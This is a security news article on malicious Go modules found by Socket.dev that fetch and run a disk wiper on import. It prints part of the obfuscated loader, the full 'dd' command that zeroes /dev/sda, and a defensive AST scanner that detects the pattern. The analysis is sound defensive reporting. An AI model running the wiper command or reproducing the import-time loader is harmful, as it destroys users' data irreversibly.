A devastating new supply-chain attack has emerged in the Go ecosystem, with attackers deploying highly destructive disk-wiping malware through seemingly legitimate modules.
This sophisticated attack exploits the inherent openness of Go’s package ecosystem, where developers routinely source modules directly from GitHub repositories with minimal gatekeeping or verification processes.
The malicious modules employ advanced obfuscation techniques to conceal their true purpose while delivering catastrophic payloads designed to irreversibly destroy data.
The attack specifically targets developers by leveraging namespace confusion, a growing problem in the Go ecosystem where multiple similarly named modules create ambiguity about which packages are legitimate.
This ambiguity makes it exceptionally difficult for developers to identify malicious imposters, even when packages aren’t strictly “typosquatted.”
The attackers carefully crafted module names to appear trustworthy at a glance, significantly increasing the likelihood of inadvertent integration into development projects.
Socket.dev researchers identified three malicious Go modules in April 2025 that employed similar obfuscation techniques: github[.]com/truthfulpharm/prototransform, github[.]com/blankloggia/go-mcp, and github[.]com/steelpoor/tlsproxy.
Despite appearing legitimate, these modules contained hidden code designed to fetch and execute remote payloads, triggering Socket’s security scanners and prompting a deeper investigation.
The impact of these modules is particularly severe as they deliver a devastating disk-wiping payload.
Once activated, the malware executes commands that systematically overwrite every byte of data on the primary storage device with zeros, making recovery virtually impossible.
For affected organizations, this results in complete data loss, operational downtime, and potentially millions in damages due to unrecoverable systems and infrastructure.
Inside the Infection Mechanism
The attackers employed sophisticated string obfuscation techniques to hide their malicious intent.
Analysis of one module revealed an initialization function that executes automatically when the package is imported:

func eGtROk() error {
    DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."}
    pBRPhsxN := runtime.GOOS == "linux"
    bcbGOM := "/bin/sh"
    vpqIU := "-c"
    PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43]...
    if pBRPhsxN {
        exec.Command(bcbGOM, vpqIU, PWcf).Start()
    }
    return nil
}

var GEeEQNj = eGtROk()
This obfuscated code assembles and executes a command that downloads a shell script containing a single devastating command:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync
This simple yet catastrophic payload uses the dd utility to write zeros directly to the primary storage device, systematically destroying the file system structure, operating system, and all user data.
The payload runs only on Linux: the loader checks runtime.GOOS before executing anything, so the systems primarily at risk are Linux-based servers and developer environments.
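The line var GEeEQNj = eGtROk() is what makes this pattern dangerous: a package-level initializer runs the moment the module is imported, before any main function. As an added illustration of how a reviewer could flag that pattern (this is example code written for this article, not Socket's tooling or the attackers' code), the following uses Go's own go/ast package to list package-level variables whose initializer calls a function that reaches exec.Command; the sample source and the names callsExec and ImportTimeExec are constructed for this example.

```go
package main

import (
	"go/ast"
	"go/parser"
	"go/token"
)
const sample = "package m\nimport \"os/exec\"\nfunc helper() int { return 1 }\nvar n = helper()\n" +
	"func eGtROk() error { exec.Command(\"/bin/sh\", \"-c\", \"true\").Start(); return nil }\nvar GEeEQNj = eGtROk()\n" // constructed sample, not the real module's source

// callsExec reports whether a function body calls exec.Command (assumes the default import name).
func callsExec(body *ast.BlockStmt) (found bool) {
	ast.Inspect(body, func(n ast.Node) bool {
		if sel, ok := n.(*ast.SelectorExpr); ok {
			pkg, isID := sel.X.(*ast.Ident)
			found = found || (isID && pkg.Name == "exec" && sel.Sel.Name == "Command")
		}
		return !found
	})
	return found
}

// ImportTimeExec returns package-level vars whose initializer calls a same-file function that shells out.
func ImportTimeExec(src string) (hits []string, err error) {
	f, err := parser.ParseFile(token.NewFileSet(), "mod.go", src, 0)
	if err != nil {
		return nil, err
	}
	shellsOut := map[string]bool{} // pass 1: functions that reach exec.Command
	for _, d := range f.Decls {
		if fn, ok := d.(*ast.FuncDecl); ok && fn.Body != nil && callsExec(fn.Body) {
			shellsOut[fn.Name.Name] = true
		}
	}
	for _, d := range f.Decls { // pass 2: var initializers run on import, before main
		if gd, ok := d.(*ast.GenDecl); ok && gd.Tok == token.VAR {
			for _, s := range gd.Specs {
				vs := s.(*ast.ValueSpec)
				for i, v := range vs.Values {
					if call, ok := v.(*ast.CallExpr); ok && i < len(vs.Names) {
						if fn, ok := call.Fun.(*ast.Ident); ok && shellsOut[fn.Name] {
							hits = append(hits, vs.Names[i].Name)
						}
					}
				}
			}
		}
	}
	return hits, nil
}
```

On the constructed sample the scan reports only GEeEQNj, since helper() never touches os/exec; a real check would also cover func init() and aliased imports.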